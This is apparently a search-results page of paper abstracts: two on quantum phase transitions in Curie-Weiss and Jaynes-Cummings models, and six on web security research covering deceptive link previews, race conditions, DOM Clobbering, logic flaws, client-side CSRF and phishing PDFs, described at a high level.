127 research outputs found

    Analysis of quantum phase transition in some different Curie-Weiss models: a unified approach

    Full text link
    A unified approach to the analysis of quantum phase transitions in some different Curie-Weiss models is proposed such that they are treated and analyzed under the same general scheme. This approach takes three steps: balancing the quantum Hamiltonian by an appropriate factor, rewriting the Hamiltonian in terms of SU(2)SU(2) operators only, and obtention of a classical Hamiltonian. SU(2)SU(2) operators are obtained from creation and annihilation operators as linear combinations in the case of fermions and as an inverse Holstein-Primakoff transformation in the case of bosons. This scheme is successfully applied to Lipkin, pairing, Jaynes-Cummings, bilayer, and Heisenberg models.Comment: 24 pages, 6 figures, submitted for publication on August 29, 2017 Some errors concerning the Jaynes-Cummings model need to be fixe

    Application of an inverse Holstein-Primakoff transformation to the Jaynes-Cummings model

    Full text link
    A modification of the Holstein-Primakoff transformation is proposed such that creation and annihilation operators for a bosonic field are rewritten as operators of a SU(2)SU(2) algebra. Once it is applied to a quantum Hamiltonian, a subsequent application of the prescription by Lieb to obtain the classical limit for spin operators allows one to write efficiently a classical Hamiltonian for the system. This process is illustrated for the MM-atom Jaynes-Cummings model.Comment: 11 pages, 3 figures, English version of the work published in Anais do XX ENMC -- Encontro Nacional de Modelagem Computacional e VIII ECTM -- Encontro de Ci\^encias e Tecnologia de Materiais, Nova Friburgo, RJ -- 16 a 19 Outubro 2017 Some errors concerning the Jaynes-Cummings model need to be fixed

    Deceptive Previews: A Study of the Link Preview Trustworthiness in Social Platforms

    Get PDF
    Social media has become a primary mean of content and information sharing, thanks to its speed and simplicity. In this scenario, link previews play the important role of giving a meaningful first glance to users, summarizing the content of the shared webpage within their title, description and image. In our work, we analyzed the preview-rendering process, observing how it is possible to misuse it to obtain benign-looking previews for malicious links. Concrete use-case of this research field is phishing and spam spread, considering targeted attacks in addition to large-scale campaigns. We designed a set of experiments for 20 social media platforms including social networks and instant messenger applications and found out how most of the platforms follow their own preview design and format, sometimes providing partial information. Four of these platforms allow preview crafting so as to hide the malicious target even to a tech-savvy user, and we found that it is possible to create misleading previews for the remaining 16 platforms when an attacker can register their own domain. We also observe how 18 social media platforms do not employ active nor passive countermeasures against the spread of known malicious links or software, and that existing cross-checks on malicious URLs can be bypassed through client and server-side redirections. To conclude, we suggest seven recommendations covering the spectrum of our findings, to improve the overall preview-rendering mechanism and increase users’ overall trust in social media platforms

    Raccoon: Automated Verification of Guarded Race Conditions in Web Applications

    Get PDF
    Web applications are distributed, asynchronous applications that can span multiple concurrent processes. They are intended to be used by a large amount of users at the same time. As concurrent applications, web applications have to account for race conditions that may occur when database access happens concurrently. Unlike vulnerability classes, such as XSS or SQL Injection, dbms based race condition flaws have received little attention even though their impact is potentially severe. In this paper, we present Raccoon, an automated approach to detect and verify race condition vulnerabilities in web application. Raccoon identifies potential race conditions through interleaving execution of user traces while tightly monitoring the resulting database activity. Based on our methodology we create a proof of concept implementation. We test four different web applications and ten use cases and discover six race conditions with security implications. Raccoon requires neither security expertise nor knowledge about implementation or database layout, while only reporting vulnerabilities, in which the tool was able to successfully replicate a practical attack. Thus, Raccoon complements previous approaches that did not verify detected possible vulnerabilities

    It's (DOM) Clobbering Time: Attack Techniques, Prevalence, and Defenses

    Get PDF
    DOM Clobbering is a type of code-less injection attack where attackers insert a piece of non-script, seemingly benign HTML markup into a webpage and transform it to executable code by exploiting the unforeseen interactions between JavaScript code and the runtime environment. The attack techniques, browser behaviours, and vulnerable code patterns that enable DOM Clobbering has not been studied yet, and in this paper, we undertake one of the first evaluations of the state of DOM Clobbering on the Web platform. Starting with a comprehensive survey of existing literature and dynamic analysis of 19 different mobile and desktop browsers, we systematize DOM Clobbering attacks, uncovering 31.4K distinct markups that use five different techniques to unexpectedly overwrite JavaScript variables in at least one browser. Then, we use our systematization to identify and characterize program instructions that can be overwritten by DOM Clobbering, and use it to present TheThing, an automated system that detects clobberable data flows to security-sensitive instructions. We instantiate TheThing on the top of the Tranco top 5K sites, quantifying the prevalence and impact of DOM Clobbering in the wild. Our evaluation uncovers that DOM Clobbering vulnerabilities are ubiquitous, with a total of 9,467 vulnerable data flows across 491 affected sites, making it possible to mount arbitrary code execution, open redirections, or client-side request forgery attacks also against popular websites such as Fandom, Trello, Vimeo, TripAdvisor, WikiBooks and GitHub, that were not exploitable through the traditional attack vectors. Finally, in this paper, we also evaluate the robustness of the existing countermeasures, such as HTML sanitizers and Content Security Policy, against DOM Clobbering

    Toward Black-Box Detection of Logic Flaws in Web Applications

    Full text link
    Abstract—Web applications play a very important role in many critical areas, including online banking, health care, and personal communication. This, combined with the limited security training of many web developers, makes web applications one of the most common targets for attackers. In the past, researchers have proposed a large number of white- and black-box techniques to test web applications for the presence of several classes of vulnerabilities. However, traditional approaches focus mostly on the detection of input validation flaws, such as SQL injection and cross-site scripting. Unfortunately, logic vulnerabilities specific to particular applications remain outside the scope of most of the existing tools and still need to be discovered by manual inspection. In this paper we propose a novel black-box technique to detect logic vulnerabilities in web applications. Our approach is based on the automatic identification of a number of behavioral patterns starting from few network traces in which users interact with a certain application. Based on the extracted model, we then generate targeted test cases following a number of common attack scenarios. We applied our prototype to seven real world E-commerce web applications, discovering ten very severe and previously-unknown logic vulnerabilities. I

    JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals

    Get PDF
    Client-side CSRF is a new type of CSRF vulnerability where the adversary can trick the client-side JavaScript program to send a forged HTTP request to a vulnerable target site by modifying the program’s input parameters. We have little to-no knowledge of this new vulnerability, and exploratory security evaluations of JavaScript-based web applications are impeded by the scarcity of reliable and scalable testing techniques. This paper presents JAW, a framework that enables the analysis of modern web applications against client-side CSRF leveraging declarative traversals on hybrid property graphs, a canonical, hybrid model for JavaScript programs. We use JAW to evaluate the prevalence of client-side CSRF vulnerabilities among all (ie, 106) web applications from the Bitnami catalog, covering over 228M lines of JavaScript code. Our approach uncovers 12,701 forgeable client-side requests affecting 87 web applications in total. For 203 forgeable requests, we successfully created client-side CSRF exploits against seven web applications that can execute arbitrary server-side state-changing operations or enable cross-site scripting and SQL injection, that are not reachable via the classical attack vectors. Finally, we analyzed the forgeable requests and identified 25 request templates, highlighting the fields that can be manipulated and the type of manipulation

    A Large-Scale Study of Phishing PDF Documents

    Full text link
    Phishing PDFs are malicious PDF documents that do not embed malware but trick victims into visiting malicious web pages leading to password theft or drive-by downloads. While recent reports indicate a surge of phishing PDFs, prior works have largely neglected this new threat, positioning phishing PDFs as accessories distributed via email phishing campaigns. This paper challenges this belief and presents the first systematic and comprehensive study centered on phishing PDFs. Starting from a real-world dataset, we first identify 44 phishing PDF campaigns via clustering and characterize them by looking at their volumetric, temporal, and visual features. Among these, we identify three large campaigns covering 89% of the dataset, exhibiting significantly different volumetric and temporal properties compared to classical email phishing, and relying on web UI elements as visual baits. Finally, we look at the distribution vectors and show that phishing PDFs are not only distributed via attachments but also via SEO attacks, placing phishing PDFs outside the email distribution ecosystem. This paper also assesses the usefulness of the VirusTotal scoring system, showing that phishing PDFs are ranked considerably low, creating a blind spot for organizations. While URL blocklists can help to prevent victims from visiting the attack web pages, PDF documents seem not subjected to any form of content-based filtering or detection
    • …
    corecore